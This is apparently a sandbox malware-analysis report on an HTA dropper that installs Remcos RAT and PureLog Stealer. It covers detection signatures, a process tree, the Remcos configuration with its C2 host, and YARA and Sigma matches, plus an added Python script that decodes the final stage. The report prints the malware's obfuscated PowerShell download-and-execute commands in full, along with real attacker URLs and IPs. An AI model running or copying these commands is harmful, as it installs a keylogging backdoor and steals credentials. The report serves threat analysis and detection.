Windows Analysis Report
LJ1IZDkHyE.hta

Overview

General Information

Sample name: LJ1IZDkHyE.hta (renamed because the original name is a hash value)
Original sample name: d6a04e7ba31d063b7176e3f9fc96c46a.hta
Analysis ID: 1518499
MD5: d6a04e7ba31d063b7176e3f9fc96c46a
SHA1: e8929b14ea18c20d4a81ac3faf681031924c9d14
SHA256: 2377328ff0a0b26133c534cb523576567f94d73726102f905e97f813b20a86a2
Tags: hta, RAT, RemcosRAT, user-abuse_ch

Detection

Cobalt Strike, Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Process Tree

  • System is w10x64
  • mshta.exe (PID: 5508 cmdline: mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 940 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1600 cmdline: PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'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'+[CHAr]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1672 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9FA0.tmp" "c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 2472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicemeetingsofpictureclearthingstob.Vbs" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 1672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • RegAsm.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
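The last PowerShell stage in the tree above (PID 1672, the parent of RegAsm.exe) is obfuscated three ways at once: the script is split into single-quoted fragments joined with +, the quote character and the $ sigil are replaced by the placeholder tokens CNA and gYF and swapped back in with two .rEPlaCE() calls, and the cmdlet the result is piped into is spelled by indexing into $env:COMSPEC ("C:\Windows\system32\cmd.exe"[4,26,25] is "iex"). The URL handed to the RunPE loader is additionally stored backwards. The script below is an added worked example, not part of the Joe Sandbox report: it performs the same transformations statically in Python and recovers both URLs. The -command argument is copied verbatim from the process tree; the only assumption is the default %COMSPEC% value, and the names RunPE.Home and VAI come from the command itself.

```python
"""Static deobfuscation of the last PowerShell stage in the process tree.
Added example, not part of the Joe Sandbox report. Reproduces what PowerShell
does when it evaluates the command: join the quoted fragments, apply the two
.rEPlaCE() calls, resolve $env:COMSPEC[4,26,25], then pull out the URLs (one
of which is stored backwards)."""
import re

# The -command argument, copied verbatim from the report's process tree (PID 1672).
OBFUSCATED = r"""('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"""

# Assumption: default %COMSPEC% on Windows. The sample indexes into this string
# to spell the cmdlet name without ever writing it in the command line.
COMSPEC = r"C:\Windows\system32\cmd.exe"


def concat_fragments(expr: str) -> str:
    """Join the '...' fragments of the leading ('a'+'b'+...) group.
    Everything from the first ).rEPlaCE( onwards is the method chain, not data."""
    head = re.split(r"\)\.replace\(", expr, maxsplit=1, flags=re.I)[0]
    return "".join(re.findall(r"'([^']*)'", head))


def ps_literal(token: str) -> str:
    """Resolve a Replace() argument as written in the sample: either a
    single-quoted literal or a [string][char]N cast (chr(N))."""
    token = token.strip()
    m = re.fullmatch(r"'(.*)'", token)
    if m:
        return m.group(1)
    m = re.fullmatch(r"(?:\[\w+\])*\[char\](\d+)", token, flags=re.I)
    if m:
        return chr(int(m.group(1)))
    raise ValueError(f"unsupported PowerShell token: {token}")


def apply_replaces(text: str, expr: str) -> str:
    """Apply each .Replace(a,b) of the method chain in order. .NET String.Replace
    is an ordinal (case-sensitive) replacement, exactly like str.replace."""
    for a, b in re.findall(r"\.replace\(([^,]+),([^)]+)\)", expr, flags=re.I):
        text = text.replace(ps_literal(a), ps_literal(b))
    return text


def resolve_comspec_index(expr: str) -> str:
    """$env:COMSPEC[i,j,k] -join '' picks single characters out of the path."""
    m = re.search(r"\$env:comspec\[([\d,]+)\]", expr, flags=re.I)
    return "".join(COMSPEC[int(i)] for i in m.group(1).split(","))


def extract_urls(script: str) -> dict:
    """Forward URLs, plus any literal stored backwards (ending in '//:ptth')."""
    plain = re.findall(r"https?://[^'\s]+", script)
    backwards = [s[::-1] for s in re.findall(r"'([^']*//:s?ptth)'", script)]
    return {"plain": plain, "reversed": backwards}


def invoke_args(script: str) -> list:
    """Arguments of the final $method.Invoke($null, [object[]]@(...)) call."""
    m = re.search(r"@\((.*?)\)\)", script)
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def deobfuscate(expr: str = OBFUSCATED) -> dict:
    script = apply_replaces(concat_fragments(expr), expr)
    return {
        "piped_into": resolve_comspec_index(expr),  # the cmdlet the text is piped to
        "script": script,
        "urls": extract_urls(script),
        "runpe_args": invoke_args(script),
    }


if __name__ == "__main__":
    result = deobfuscate()
    print("piped into:", result["piped_into"])
    print(result["script"])
    print("URLs:", result["urls"])
    print("RunPE.Home.VAI args:", result["runpe_args"])
```

Running it prints the readable script (download a Base64 text from ia600100.us.archive.org, Assembly.Load it, call RunPE.Home.VAI) piped into iex, and the argument list of that call: the reversed literal becomes http://104.168.32.148/345/CHPPZA.txt, and the fifth argument, RegAsm, names the process that appears as the final child in the tree. The same host, 104.168.32.148, is also present in the first stage: decoding the Base64 in the Sigma data at the bottom of the page yields an Add-Type/URLDownloadToFile stub that fetches /345/nicemeetingsofpictureclearthingstobe.tIF from it into %APPDATA%\nicemeetingsofpictureclearthingstob.Vbs, the file wscript.exe runs next.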
Threat Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration (Remcos)

{
  "Host:Port:Password": "ramcxx.duckdns.org:50312:1",
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-M3P7YT",
  "Keylog flag": "1",
  "Keylog path": "Application path",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Yara Overview

Dropped Files
Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security

Memory Dumps (first 5 of 25 entries shown)
Source: 00000009.00000002.2263876284.00000000060CF000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 0000000B.00000002.4500391672.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 0000000B.00000002.4501290149.00000000028DE000.00000004.00000010.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000009.00000002.2285326980.0000000008730000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security

Unpacked PEs (first 5 of 22 entries shown)
Source: 11.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 11.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 11.2.RegAsm.exe.400000.0.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 11.2.RegAsm.exe.400000.0.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
Source: 11.2.RegAsm.exe.400000.0.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

AMSI Buffers
Source: amsi32_1600.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security

System Summary (Sigma matches)

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
Source: Process started | Author: Thomas Patzke | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 